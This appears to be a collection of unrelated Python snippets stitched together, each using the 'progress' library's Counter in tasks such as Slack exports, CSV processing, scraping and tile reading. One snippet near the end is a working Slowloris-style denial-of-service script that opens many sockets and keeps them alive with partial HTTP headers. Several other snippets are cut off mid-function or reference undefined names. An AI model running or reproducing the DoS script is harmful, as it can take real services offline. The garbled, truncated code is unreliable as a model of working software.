def _process_file(mapper: Mapper, fname: str, pool: Pool, file_name_suffix: str,
                  chunksize: int) -> Path:
    """
    Creates a new CSV file by running each row in the input file named fname
    through the mapper using multiple processes.
    """
    ROW_FIELD = "_row"
    try:
        output_path = _output_file_path(fname, file_name_suffix)
        with open(fname, "r") as csvin, open(
                output_path, "w") as csvout, Counter(f"{fname}: ") as counter:
            fieldnames = [ROW_FIELD, SUCCEEDED_FIELD] + mapper.fieldnames
            reader = csv.DictReader(csvin)
            writer = csv.DictWriter(csvout, fieldnames=fieldnames)
            writer.writeheader()
            for i, row in enumerate(
                    pool.imap(mapper.map, reader, chunksize=chunksize), 1):
                counter.next()
                try:
                    row[ROW_FIELD] = i
                    writer.writerow(row)
                    csvout.flush()
                except ValueError as ex:
                    LOG.error("error writing row: %s", str(ex))
        return output_path
    except KeyboardInterrupt:
        sys.stderr.write("Cancelled by Ctrl-C!\n")
        pool.terminate()
        pool.join()
        sys.exit(130)
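# Hypothetical driver for _process_file() above (not part of the original
# module), assuming a Mapper object that exposes .map(row) and .fieldnames;
# the Pool is created here so the Ctrl-C handling above can terminate it.
from multiprocessing import Pool
from pathlib import Path
from typing import List


def process_all(mapper: "Mapper", filenames: List[str],
                file_name_suffix: str = "_mapped",
                chunksize: int = 16) -> List[Path]:
    with Pool() as pool:
        return [_process_file(mapper, fname, pool, file_name_suffix, chunksize)
                for fname in filenames]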
def getProjectLinks(url):
    print("Gathering links...")
    projectLinks = set()
    browser = webdriver.Firefox(executable_path=r"C:\Program Files\gecko")
    browser.get(url)
    # Wait for website to load
    time.sleep(5)
    # Closes cookie-acceptance pop-up
    try:
        browser.find_element_by_css_selector(
            '#CybotCookiebotDialogBodyLevelButtonAccept').click()
    except Exception:
        pass
    counter = Counter("Propagating webpages")
    # Simulates click on 'view more' button until exhausted
    while True:
        try:
            # Waits a random time to prevent a DDOS ban
            time.sleep(random.uniform(0.2, 1.3))
            browser.find_element_by_css_selector('a.ng-isolate-scope').click()
        except Exception:
            break
        counter.next()
    counter.finish()
    links = browser.find_elements_by_xpath("//a[@href]")
    for bigl in links:
        # Ensures that the link is a valid project
        if "/projects/" in bigl.get_attribute(
                "href") and "/coming_soon/" not in bigl.get_attribute("href"):
            projectLinks.add(bigl.get_attribute("href"))
    browser.quit()
    return projectLinks
def split_video(filepath: str, output_dir: str, metadata):
    # clear any frames left over from a previous run
    files = glob.glob(output_dir + '/*')
    for f in files:
        os.remove(f)
    cap = cv.VideoCapture(filepath)
    prev = None
    curr = None
    i = 0
    mse = 100
    counter = Counter("Splitting ")
    while cap.isOpened():
        ret, curr = cap.read()
        # if frame is read correctly ret is True
        if not ret:
            break
        if prev is not None:
            mse = (np.square(curr - prev)).mean(axis=None)
        if mse > MSE_THRESH:
            new_size = (curr.shape[1] // DOWNSCALE, curr.shape[0] // DOWNSCALE)
            resized = cv.resize(curr, new_size)
            cv.imwrite(output_dir + FORMAT_STRING.format(i), resized)
        prev = curr
        i += 1
        counter.next()
    cap.release()
    yield
async def export_users(ctx: ExporterContext):
    users_generator = await utils.with_retry(ctx.slack_client.users_list)
    all_users = []
    counter = Counter("Exporting users ")

    try:
        async for users in users_generator:
            all_users.extend(users["members"])

            for user in users["members"]:
                user_obj = models.SlackUser(user)
                counter.next()

                for url, filename in user_obj.get_exportable_data():
                    full_filename = os.path.join(constants.USERS_EXPORT_DIR,
                                                 filename)
                    ctx.downloader.enqueue_download(url, full_filename)

            await ctx.downloader.flush_download_queue()
    except SlackApiError as e:
        log.error("Got an API error while trying to export user info",
                  exc_info=e)

    ctx.downloader.write_json(
        os.path.join(constants.USERS_EXPORT_DIR, constants.USERS_JSON_FILE),
        all_users)
    counter.finish()
def count_files(inp):
    counter = Counter('Loading files tree... ')
    t = 0
    for dirpath, dirs, files in os.walk(inp):
        for filename in files:
            t += 1
            counter.next()
    counter.finish()
    print()
    return t
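# Sketch (not from the original source): recent versions of the progress
# package also provide Counter.iter(), which advances the counter for each
# element and finishes it automatically. A roughly equivalent variant of
# count_files() could look like this; note it ticks once per directory rather
# than once per file.
def count_files_iter(inp):
    total = 0
    for dirpath, dirs, files in Counter('Loading files tree... ').iter(os.walk(inp)):
        total += len(files)
    print()
    return total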
def start_sampling(self, percentile_samples: int, info: str) -> None:
    """Run the exact computation of the interval, or randomly select a subset
    of all possible programs (combining the values of their annotations) to
    approximate the exact interval."""
    ## To find all possible consistent programs
    #local_n_programs = {}
    n_used_vars = len(self.used_vars)
    poss_prog_format = '{0:0' + str(n_used_vars) + 'b}'
    poss_asignations = pow(2, n_used_vars)
    counter = Counter('Processing possible programs (%d): ' % (poss_asignations),
                      max=poss_asignations)
    for asignation in range(poss_asignations):
        asign_list = list(poss_prog_format.format(asignation))
        unique_world_program = ['x'] * self.utils.em_vars
        for index, value in enumerate(asign_list):
            unique_world_program[int(self.used_vars[index])] = int(value)
        prog, id_prog = self.utils.map_world_to_prog(unique_world_program)
        if id_prog not in self.local_n_programs:
            self.local_n_programs.append(id_prog)
            #evidence = {str(self.used_vars[index]): int(val) for index, val in enumerate(asign_list)}
            #self.local_n_programs[id_prog] = self.utils.em.get_sampling_prob(evidence)
        counter.next()
    counter.finish()
    ##
    #n_programs = self.utils.get_n_programs()
    n_programs = len(self.local_n_programs)
    print("Number of programs: " + str(n_programs))
    if percentile_samples == 100:
        # To compute the exact interval
        lit_to_query = self.utils.search_lit_to_consult()
        n_samples = n_programs
        unique_programs = self.local_n_programs
        #unique_programs = range(n_programs)
        repeated_programs = 0  # ????
    else:
        lit_to_query = self.utils.get_interest_lit()
        n_samples = int(get_percentile(percentile_samples, n_programs))
        sampled_programs = np.random.choice(self.local_n_programs, n_samples,
                                            replace=True)
        #sampled_programs = np.random.choice(n_programs, n_samples, replace=True)
        unique_programs = list(set(sampled_programs))
        repeated_programs = n_samples - len(unique_programs)
    prog_data = self.consult_programs(unique_programs, self.adapted_annots,
                                      lit_to_query)
    execution_time, inconsistent_programs = prog_data
    self.results['data'] = {
        'n_samples': n_samples,
        'time': execution_time,
        'repeated_programs': repeated_programs,
        'inconsistent_programs': inconsistent_programs,
        'worlds_consulted': len(self.known_evidences)
    }
    write_results(self.results, self.utils.save_path, info)
def import_NICE_KSAT(self, workbook):
    """Import the NICE KSATs and their relationships with Workroles

    :param workbook: NICE CWF spreadsheet represented as a python class
    :type workbook: class 'xlrd.book.Book'
    """
    log.info("Parsing NICE CWF KSATs")
    bar = Counter(
        'Parsing NICE CWF KSATs ',
        suffix='%(percent)d%% (%(index)d/%(max)d) [%(elapsed_td)s]')
    all_sheets = workbook.sheets()
    graph = self.db.graph
    for sheet in all_sheets:
        if not re.match(r"[A-Z]+-[A-Z]+-[0-9]+", sheet.name):
            continue
        workrole_id = re.match(r"([A-Z]{2}-[A-Z]{3}-[0-9]{3})", sheet.name)[1]
        for row in sheet._cell_values:
            # capture and store the KSAT unless it's a header row
            try:
                ksat = parse_ksats(row[0])[0]
            except Exception:
                # Ignore header rows that don't contain KSATs
                continue
            ksat_node = KSAT()
            ksat_node.id = ksat
            ksat_node.description = row[1]
            ksat_node.type = ksat_id_to_type(ksat)
            # create the node if it doesn't exist
            graph.create(ksat_node)
            # pull the current relationships from the db
            graph.pull(ksat_node)
            ksat_node.__node__.add_label(ksat_node.type.capitalize())
            ksat_node.nice_workrole.add(
                NICEWorkrole.match(graph, workrole_id).first())
            # store the updated relationship in the db
            graph.push(ksat_node)
            bar.next()
    bar.finish()
    log.info("Done Parsing NICE CWF KSATs")
def analyzeArticles(self, preprocessor: preprocessing.Preprocessor, dtype='reuters'):
    # check data type
    if dtype == 'reuters':
        # initialize SoupLoader
        soupLoader = data.SoupLoader(-1)
        provider = data.ReutersProvider(soupLoader)
    else:
        provider = data.TwentyNewsProvider('../TwentyNews/')

    # start Counters
    bar = PCounter("Analyzing Articles: ")
    counter = Counter()
    occurances = Counter()
    categories = Counter()

    while True:
        try:
            # increase bar progress
            bar.next()
            # throws an exception if there are no more articles; saving is not needed
            article = data.ArticleFactory.GET_NEXT_ARTICLE(provider)
            # update the counter with the preprocessed array of words
            words = preprocessor.process(article).preprocessed
            counter.update(words)
            # update in how many articles these words occur
            occurances.update(list(words.keys()))
            # update categories counter
            categories.update([article.category])
        except data.OutOfArticlesError:
            # abort while loop. No more Articles
            break
    bar.finish()

    self._articleCount = bar.index
    self._words = self.cropWords(counter, occurances)
    self._categories = categories
def __init__(self, method, query_ops):
    if method == Collector._search:
        self.dates = (query_ops['since'], query_ops['until'])
    elif method == Collector._stream:
        self.dates = (datetime.date.today(), query_ops['until'])
    else:
        self.dates = None

    if self.dates:
        days = (self.dates[1] - self.dates[0]).days
        self._progress = Bar('Processing day: ', max=days)
    else:
        self._progress = Counter('Processing tweets: ')
def __init__(self):
    super().__init__()
    self.counter = 0
    self.run_forever = True
    self.limit = 0
    if len(sys.argv) > 1:
        # A limit was provided on the command line; stop after that many tweets
        self.limit = int(sys.argv[1])
        self.run_forever = False
        self.bar = Bar('Collecting tweets...', max=self.limit)
    else:
        # No user-provided value, run forever
        self.bar = Counter('Collecting tweets...')
def load_tweets():
    with open("data_files/perceptron_traindata.json", "r") as training_data_load_file:
        training_data = json.load(training_data_load_file)
    preprocessed_training_data = {}
    stop_terms = generate_stop_terms("config_files/preprocess_stop_terms.txt")
    counter = Counter("Loading tweets...")
    for (tweet, rating) in training_data.items():
        new_tweet = preprocess(tweet, stop_terms)
        new_tweet_text = " ".join(new_tweet)
        preprocessed_training_data[new_tweet_text] = rating
        counter.next()
    counter.finish()
    return preprocessed_training_data
def consult_programs(self, unique_programs: list, adapted_annots: dict,
                     lit_to_query: list) -> list:
    """To iterate over sampled programs consulting for literals"""
    self.results['status'] = {
        lit: copy.copy(STATUS) for lit in lit_to_query
    }
    # To count the number of inconsistent programs sampled
    inconsistent_programs = 0
    counter = Counter('Processing programs (%d): ' % (len(unique_programs)),
                      max=len(unique_programs))
    initial_time = time.time()
    for sampled_prog in unique_programs:
        sampled_in_bin = self.utils.id_prog_to_bin(sampled_prog)
        # Build the program from the sampled annotations
        #self.replace_in_program(sampled_in_bin)
        # To create the expression that generates a sampled program
        expression = ''
        for index, value in enumerate(sampled_in_bin):
            if self.utils.prog_in_bin[index] == 'x':
                if value == 1:
                    expression += adapted_annots[index]['True'] + ' & '
                else:
                    expression += adapted_annots[index]['False'] + ' & '
        flag = False
        #program = self.utils.map_bin_to_prog(self.utils.prog_in_bin)
        program = self.utils.map_bin_to_prog(sampled_in_bin)
        status = query_to_delp(program, lit_to_query)
        prob = 0.0
        models = satisfiable(eval(expression[:-3]), all_models=True)
        for model in models:
            if model:
                # The sampled program is consistent, i.e. a valid program
                evidence = to_evidence(model)
                if evidence not in self.known_evidences:
                    # Get probability of the new evidence
                    prob += self.utils.em.get_sampling_prob(evidence)
                    self.known_evidences.append(evidence)
            else:
                # The sampled program is inconsistent
                inconsistent_programs += 1
                flag = True
        if not flag:
            self.update_results(status, prob)
        counter.next()
    counter.finish()
    print(self.utils.model_path + " <<Complete>>")
    execution_time = time.time() - initial_time
    return [execution_time, inconsistent_programs]
def consult_worlds(self, worlds: list, lit_to_query: list) -> float:
    """To iterate over sampled worlds consulting for literals"""
    self.results['status'] = {
        lit: copy.copy(STATUS) for lit in lit_to_query
    }
    # To control if worlds are sampled or generated
    if isinstance(worlds[0], (int, np.int64)):
        to_convert = 'self.utils.id_world_to_bin(sampled_world)'
    else:
        to_convert = 'sampled_world'
    counter = Counter('Processing worlds: ', max=len(worlds))
    initial_time = time.time()
    for sampled_world in worlds:
        # Get world in list format
        world, evidence = eval(to_convert)
        # Get the probability of the world
        prob_world = self.utils.em.get_sampling_prob(evidence)
        # Build the program for world
        program, id_program = self.utils.map_world_to_prog(world)
        status = self.known_progs.search_sample(id_program)
        if status == -1:
            # New program
            status = query_to_delp(program, lit_to_query)
            self.known_progs.save_sample(id_program, status)
            for literal, response in status.items():
                # Update number of worlds
                self.results['status'][literal][response['status']] += 1
                # Update probabilities
                self.results['status'][literal][
                    'p' + response['status']] += prob_world
                # Save time to compute the query in the world
                self.results['status'][literal]['time'] += response['time']
        else:
            # Known program
            for literal, response in status.items():
                # Update number of worlds
                self.results['status'][literal][response['status']] += 1
                # Update probabilities
                self.results['status'][literal][
                    'p' + response['status']] += prob_world
                # Save time to compute the query in the world
                self.results['status'][literal]['time'] += 0
        counter.next()
    counter.finish()
    print(self.utils.model_path + " <<Complete>>")
    execution_time = time.time() - initial_time
    return execution_time
def cli_runner(*varags, **args):
    signal(SIGINT, ctrl_c_handler)  # Handle Ctrl + C
    settings = Settings.instance()
    settings.set(args)
    if settings.debug:
        print("Command line inputs: " + str(varags))

    counter = None
    if settings.ui:
        counter = Counter('Discovering Files: ')

    def counter_func():
        if counter is not None:
            counter.next()

    files_to_process = []
    if len(varags) > 0:
        for arg in varags:
            files_to_process += find_files(arg, counter_func)
    else:
        if settings.debug:
            print("No inputs provided, Scanning local directory")
        files_to_process = find_files(PWD, counter_func)
    if counter:
        counter.finish()

    problematic_certs = process_certs(files_to_process, settings)
    if settings.save_results:
        save_file(problematic_certs)
    for problem in problematic_certs:
        print(problem)
    if settings.send_to_slack and len(problematic_certs) > 0:
        send_to_slack(problematic_certs)
def main():
    args = get_arguments()
    if args.verbosity >= 1:
        print("\n--- Generating barcodes ---")
    barcodes = []
    for i in range(args.numOfBc):
        barcode = generate_barcode(args.length, "")
        if not len(barcodes) == 0:
            if args.verbosity >= 2:
                c = Counter(" Barcode {} candidate no: ".format(i + 1))
            while (not 0.4 <= gc_content(barcode) <= 0.6) or min(
                    distance(barcode, previous_bc)
                    for previous_bc in barcodes) <= args.distance:
                barcode = generate_barcode(args.length, "")
                if args.verbosity >= 2:
                    c.next()
            if args.verbosity >= 2:
                c.finish()
                print("")
        barcodes.append(barcode)
        if args.verbosity >= 1:
            print('Barcode {}: {}'.format(i + 1, barcode))
            print('GC-content: {}'.format(gc_content(barcode)))
    write_2_file(barcodes, args.output, args.verbosity)
    return
def get_messages(self):
    # Get all messages of user
    # Output format:
    # [{'id': '13c...7', 'threadId': '13c...7'}, ...]

    # if os.path.exists("messages.pickle"):
    #     with open("messages.pickle", "rb") as token:
    #         messages = pickle.load(token)
    #     return messages

    # includeSpamTrash
    # labelIds
    response = self.service.users().messages().list(
        userId=self.user_id).execute()
    messages = []
    est_max = response["resultSizeEstimate"] * 5
    progress = Counter(
        f"{helpers.loader_icn} Fetching messages page ".ljust(
            _progressPadding, " "))
    if "messages" in response:
        messages.extend(response["messages"])
    while "nextPageToken" in response:
        page_token = response["nextPageToken"]
        response = (self.service.users().messages().list(
            userId=self.user_id, pageToken=page_token).execute())
        messages.extend(response["messages"])
        progress.next()
    progress.finish()
    return messages
async def export_files(ctx: ExporterContext):
    files_generator = utils.AsyncIteratorWithRetry(
        ctx.slack_client.files_list,
        count=constants.ITEM_COUNT_LIMIT,
        ts_to=ctx.export_time  #, ts_from=ctx.last_export_time
    )
    all_files = []
    counter = Counter("Exporting files ")

    try:
        await files_generator.run()

        async for file_resp in files_generator:
            all_files.extend(file_resp["files"])

            for sfile in file_resp["files"]:
                file_obj = models.SlackFile(sfile)
                export_file(ctx, file_obj)
                counter.next()

            try:
                await ctx.downloader.flush_download_queue()
            except utils.AggregateError as e:
                log.warning(
                    f"Caught {len(e.errors)} errors while downloading files.")
                for err in e.errors:
                    log.warning(str(err))
    except SlackApiError as e:
        log.error("Got an API error while trying to obtain file info",
                  exc_info=e)

    ctx.downloader.write_json(
        os.path.join(constants.FILES_EXPORT_DIR, constants.FILES_JSON_FILE),
        all_files)
    counter.finish()
def main():
    # open the books.csv file
    inloop = True
    books_csvfile_path = "../books.csv"
    books_csvfile = None
    while inloop:
        try:
            if books_csvfile_path.endswith("books.csv"):
                books_csvfile = open(os.path.realpath(books_csvfile_path))
                inloop = False
            else:
                raise FileNotFoundError()
        except FileNotFoundError as error:
            print("We couldn't find the 'books.csv' file.\n")
            books_csvfile_path = input(
                "Please input the 'books.csv' absolute file path: ")
            inloop = True

    books = csv.reader(books_csvfile)

    # iterate through all books
    row_count = 0
    print(' This process may take long')
    progress = Counter(' - Importing books: ')
    for isbn, title, author, year in books:
        # skip the first line of the file because it contains the csv headers
        if not row_count == 0:
            book = Book(isbn, title, author, year)
            book.insertToTable()
            progress.next()
        row_count += 1
    db.commit()
    progress.finish()
    db.remove()
    print(" Books imported successfully!")
def add_progress_bar(self):
    self.progress_indicator = Counter(self.name)
def scrape(self, filename):
    """
    Scrapes metadata of S2ORC articles from given file

    :param filename: name of file in data folder to scrape from
    """
    print(
        f'Collection: {self._collection.database.name}.{self._collection.name}. Database: S2ORC. File: {filename}'
    )
    abstracts = []
    articles = []
    no_id = 0
    unreadable = 0

    # counter
    counter = Counter(message='Articles analyzed: ')

    file = open(os.path.join(DATA_PATH, filename), 'r')

    # load GB to US dictionary
    with open('miscellaneous/us_gb_dict.txt', 'r') as convert:
        spelling = json.load(convert)
    print('Stored json dictionary in memory')

    for data in file:
        article = json.loads(data)

        # ignore abstract if article is not from PubMed or PubMedCentral
        uid = article.get('pubmed_id')
        pmc = article.get('pmc_id')
        doi = article.get('doi')
        paperid = article.get('paper_id')
        if not uid and not pmc and not doi and not paperid:
            no_id += 1
            counter.next()
            continue

        # store abstract text for use by mat2vec below
        abstract = article.get('abstract')

        # continues if paper does not have abstract
        if not abstract:
            unreadable += 1
            counter.next()
            continue

        # replaces ':::' with newline
        abstract = abstract.replace('::: ', '\n')

        # segments abstract by sentence
        doc = self.nlp(abstract)
        sentences = []
        is_unreadable = False

        # processes sentence text using mat2vec processor
        for sent in doc.sents:
            try:
                tokens, materials = self.processor.process(sent.text)
            except OverflowError:
                is_unreadable = True
                break

            processed_sent = ' '.join(
                [token.lemma_ for token in sent if not token.is_stop])
            for gb, us in spelling.items():
                processed_sent = processed_sent.replace(gb, us)
            sentences.append(processed_sent)

        # if processor (from above) throws an error, skip the paper
        if is_unreadable:
            unreadable += 1
            counter.next()
            continue

        processed_abstract = '\n'.join(sentences)

        # create new document and store new article document if not in collection
        article = {
            'doi': doi,
            'uid': uid,
            'pmc': pmc,
            'paperid': paperid,
            'title': article.get('title'),
            'abstract': abstract,
            'url': article.get('s2_url'),
            'creators': self._get_creators(article.get('authors')),
            'publication_name': article.get('journal'),
            'year': article.get('year'),
            'database': 's2orc',
            'processed_abstract': processed_abstract
        }
        articles.append(article)
        abstracts.append(processed_abstract)
        counter.next()

        # classify abstracts if 20000 have been stored
        if len(abstracts) == 20000:
            self._store(articles, abstracts)
            articles = []
            abstracts = []

    counter.finish()

    # unreadable papers
    print(f'No ID: {no_id}')
    print(f'Unreadable papers: {unreadable}')

    # classifies and stores metadata
    if abstracts:
        self._store(articles, abstracts)
        print()
    else:
        print('No abstracts to classify.\n')
        return

    # prints classifier metrics
    for classifier in self._classifiers:
        classifier.print_metrics()
        classifier.reset_metrics()

    # prints general tag metrics
    if self._save:
        print(f'Total articles analyzed: {self._gen_total}.')
        print(
            f'Stored {self._gen_new} new abstracts to \'{self._gen_tag}\'.'
        )
        print()
        self._gen_new = 0
        self._gen_total = 0
def init(ip, port):
    soc = socket(AF_INET, SOCK_STREAM)
    soc.settimeout(4)
    soc.connect((ip, int(port)))
    soc.send('GET /?{} HTTP/1.1\r\n'.format(randint(0, 2000)).encode('utf-8'))
    for header in headers:
        soc.send('{}\r\n'.format(header).encode('utf-8'))
    return soc


if __name__ == '__main__':
    if len(argv) < 5:
        exit(REDC + "Usage: {} ip port count time".format(argv[0]))
    # parse the positional arguments (assumed order from the usage string: ip port count time)
    ip, port = argv[1], argv[2]
    count, timer = int(argv[3]), int(argv[4])
    socketList = []
    logger.info('count: {} timer: {}'.format(count, timer))
    bar = Counter(GREENC + 'Creating sockets: ' + YELLOWC, max=count)
    for _ in range(count):
        try:
            soc = init(ip, port)
        except error:
            break
        socketList.append(soc)
        bar.next()
    print()
    while True:
        sendbar = PixelBar(GREYC + 'Sending keep-alive Headers' + REDC, max=timer)
        logger.info('Sending keep-alive Headers')
        # iterate over a copy so sockets can be removed safely on failure
        for soc in list(socketList):
            try:
                soc.send('X-a {}\r\n'.format(randint(1, 6000)).encode('utf-8'))
            except error:
                socketList.remove(soc)
def counter_progress_cli(msg, max=0):
    return Counter(msg + ' - ')
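# Assumed usage of the helper above (not from the original source): the
# returned progress Counter is advanced manually and closed with finish();
# the `max` argument is currently ignored because counters are unbounded.
items = ['a.pem', 'b.pem']  # placeholder iterable
progress = counter_progress_cli('Checking certificates')
for item in items:
    progress.next()
progress.finish()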
urlHtml = requests.get(url).content
# soup object of html
soup = bs(urlHtml, 'lxml')
# goes through each tag with an href in the page
for tag in soup.find_all(href=True):
    # href in tag
    href = tag['href']
    # checks that it is a uri, that it is not '/' or '#', and that it isn't already in the list
    if (href.startswith('/') and not href.startswith('//')
            and len(href) > 1 and href not in hrefs):
        # adds href to the list
        hrefs.append(href)


count = Counter("Scraping : ")
# list for hrefs
hrefs = []
# input for base url
base = input()
# checks if base ends with '/'
if base.endswith('/'):
    # position of the last character before '/'
    lastPos = len(base) - 1
    # removes '/' from base
    base = base[0:lastPos]
# gets all the hrefs from the base URL
getHrefs(base, "", hrefs)
# loops through hrefs
# hrefs will be added as it loops through each href
# but will end once all hrefs have been checked
async def export_conversation_history(ctx: ExporterContext,
                                      convo: models.SlackConversation):
    def file_filter(raw_file: Dict[str, Any]) -> bool:
        if "mode" in raw_file and raw_file["mode"] == "tombstone":
            return False

        filename = os.path.join(constants.FILES_EXPORT_DIR, raw_file["id"])
        return not ctx.downloader.exists(filename)

    history_generator = utils.AsyncIteratorWithRetry(
        ctx.slack_client.conversations_history,
        channel=convo.id,
        limit=constants.ITEM_COUNT_LIMIT,
        latest=ctx.export_time,
        oldest=ctx.last_export_time)

    history_folder = os.path.join(ctx.output_directory,
                                  constants.CONVERSATIONS_EXPORT_DIR, convo.id,
                                  constants.HISTORY_JSON_DIR)
    history_fragment = ctx.fragments.create(history_folder)

    temporary_dir = tempfile.TemporaryDirectory()
    temp_fragment = ctx.fragments.create(temporary_dir.name)

    counter = Counter(f"Exporting conversation history ({convo.name}) ")

    try:
        await history_generator.run()

        async for history_resp in history_generator:
            for msg in history_resp["messages"]:
                msg_obj = models.SlackMessage(msg)

                try:
                    if msg_obj.has_files:
                        files = await msg_obj.get_files(ctx, file_filter)

                        for f in files:
                            export_file(ctx, f)
                except SlackApiError as e:
                    log.error(
                        f"Error while obtaining file metadata for message {msg_obj.ts} in channel {convo.id}",
                        exc_info=e)

                try:
                    if msg_obj.has_replies:
                        await msg_obj.populate_replies(ctx, convo)
                except SlackApiError as e:
                    log.error(
                        f"Error while obtaining reply metadata for message {msg_obj.ts} in channel {convo.id}",
                        exc_info=e)

                temp_fragment.append(msg_obj.data)
                counter.next()

            try:
                await ctx.downloader.flush_download_queue()
            except utils.AggregateError as e:
                log.warning(
                    f"Caught {len(e.errors)} errors while downloading files.")
                for err in e.errors:
                    log.warning(str(err))

            temp_fragment.commit_fragments()
    except SlackApiError as e:
        log.error(
            "Got an API error while trying to obtain conversation history",
            exc_info=e)
    except Exception as e:
        log.error(
            f"Uncaught {e.__class__.__name__}; you may need to do a full resync",
            exc_info=e)

    history_fragment.extend(
        temp_fragment[::-1])  # Slack messages are stored in descending order
    temp_fragment.close()
    history_fragment.close()
    temporary_dir.cleanup()
    counter.finish()
def read_tiles(src, min_zoom=0, max_zoom=None, tile_size=256):
    """This function is a generator that reads all tiles that overlap with the
    extent of src between min_zoom and max_zoom.

    Parameters
    ----------
    src : rasterio.DatasetReader
        Input dataset, opened for reading
    min_zoom : int, optional (default 0)
    max_zoom : int, optional (default None)
        If None, max_zoom will be calculated based on the extent of src
    tile_size : int, optional (default 256)
        length and width of tile

    Yields
    ------
    tile (mercantile.Tile), tile data (of shape (tile_size, tile_size)), and tile transform
    """

    def _read_tile(vrt, tile, tile_size=256):
        """Read a tile of data from the VRT.

        If the tile bounds fall outside the vrt bounds, we have to calculate
        offsets and widths ourselves (because WarpedVRT does not allow
        boundless reads) and paste the data that were read into an otherwise
        blank tile (filled with Nodata value).

        Parameters
        ----------
        vrt : rasterio.WarpedVRT
            WarpedVRT initialized from the data source.  Example:
            with WarpedVRT(
                src,
                crs="EPSG:3857",
                nodata=src.nodata,
                resampling=Resampling.nearest,
                width=tile_size,
                height=tile_size,
            ) as vrt
        tile : mercantile.Tile
            Tile object describing z, x, y coordinates
        tile_size : int, optional (default 256)
            length and width of tile

        Returns
        -------
        tuple of numpy array of data with shape (tile_size, tile_size), tile transform object
        """
        tile_bounds = mercantile.xy_bounds(*tile)
        window = vrt.window(*tile_bounds)
        dst_transform = vrt.window_transform(window)
        scaling = Affine.scale(window.width / tile_size,
                               window.height / tile_size)
        dst_transform *= scaling

        x_res = abs(dst_transform.a)
        y_res = abs(dst_transform.e)
        left_offset = max(
            int(round((vrt.bounds[0] - tile_bounds[0]) / x_res, 0)), 0)
        right_offset = max(
            int(round((tile_bounds[2] - vrt.bounds[2]) / x_res, 0)), 0)
        bottom_offset = max(
            int(round((vrt.bounds[1] - tile_bounds[1]) / y_res, 0)), 0)
        top_offset = max(
            int(round((tile_bounds[3] - vrt.bounds[3]) / y_res, 0)), 0)

        width = tile_size - left_offset - right_offset
        height = tile_size - top_offset - bottom_offset

        if not (width > 0 and height > 0):
            # No data can be read within a window that has no width or height,
            # so return a blank tile
            data = np.empty((1, tile_size, tile_size), dtype=vrt.dtypes[0])
            data.fill(vrt.nodata)
            return data[0], dst_transform

        data = vrt.read(out_shape=(1, height, width), window=window)

        if width != tile_size or height != tile_size:
            # Create a blank tile (filled with nodata) and paste in data
            out = np.empty((1, tile_size, tile_size), dtype=vrt.dtypes[0])
            out.fill(vrt.nodata)
            out[0, top_offset:top_offset + data.shape[1],
                left_offset:left_offset + data.shape[2]] = data
            data = out

        return data[0], dst_transform

    with WarpedVRT(
            src,
            crs="EPSG:3857",
            nodata=src.nodata,
            resampling=Resampling.nearest,
            width=tile_size,
            height=tile_size,
    ) as vrt:
        if max_zoom is None:
            max_zoom = get_default_max_zoom(src)

        tiles = mercantile.tiles(*get_geo_bounds(src),
                                 range(min_zoom, max_zoom + 1))

        for tile in Counter("Extracting tiles... ").iter(tiles):
            data, transform = _read_tile(vrt, tile, tile_size)
            yield tile, data, transform
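# Hypothetical driver for read_tiles() (not part of the original module),
# assuming rasterio and numpy are available; it saves each tile's pixel data
# to a .npy file named after its slippy-map z/x/y coordinates.
import numpy as np
import rasterio


def dump_tiles(src_path, out_dir, min_zoom=0, max_zoom=4):
    with rasterio.open(src_path) as src:
        for tile, data, transform in read_tiles(src, min_zoom=min_zoom,
                                                max_zoom=max_zoom):
            np.save(f"{out_dir}/{tile.z}_{tile.x}_{tile.y}.npy", data)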
temporary_directory_path = os.path.abspath(args.temporary_directory_path)
checkpoint = args.checkpoint

with open(corpus_path, "r") as corpus_file, tempfile.TemporaryDirectory(
        dir=temporary_directory_path) as tmp_file_dir, Pool(
            processes=cpu_count()) as pool:
    if args.split_by_lines:
        print("Splitting by number of lines")
        articles = extract_article_by_number_of_sentence(
            corpus_file, args.split_by_lines)
    else:
        print("Splitting by blank lines")
        articles = extract_article_by_blank_lines(corpus_file)

    results = []
    for i, article in Counter("Spawning threads...").iter(
            enumerate(articles)):
        if i < checkpoint:
            continue
        while psutil.virtual_memory().free * 0.9 < psutil.Process(
                os.getpid()).memory_full_info().rss / (i + 1):
            print(f"""Waiting 5s for RAM to be freed.
Currently {psutil.virtual_memory().percent}% of RAM is used.""")
            sleep(5)
            print([res.get() for res in results])
        f_args = (
            article,
            output_path,
            vocab_path,
    return startupTime, traffic


startupTime = time()
traffic = 0.0

with open('./data.csv', 'r') as csvreader:
    allRows = list(csv.DictReader(csvreader))
    allRowsForWrite = list(allRows)
    i = 0
    ids = []
    urls = []
    scientific_names = []
    bar = Counter('Loading progress: ')
    # register the exit handler once, before processing rows
    atexit.register(ataxit_handler, allRowsForWrite=allRowsForWrite)
    for row in allRows:
        i += 1
        if i > 20:
            imagesContent = get_images(urls)
            startupTime, traffic = set_images(ids, scientific_names,
                                              imagesContent, startupTime,
                                              traffic)
            del allRowsForWrite[:20]
            i, ids, urls, scientific_names = 1, [], [], []
        ids.append(row['id'])
        urls.append(row['image_url'])
        scientific_names.append(row['scientific_name'])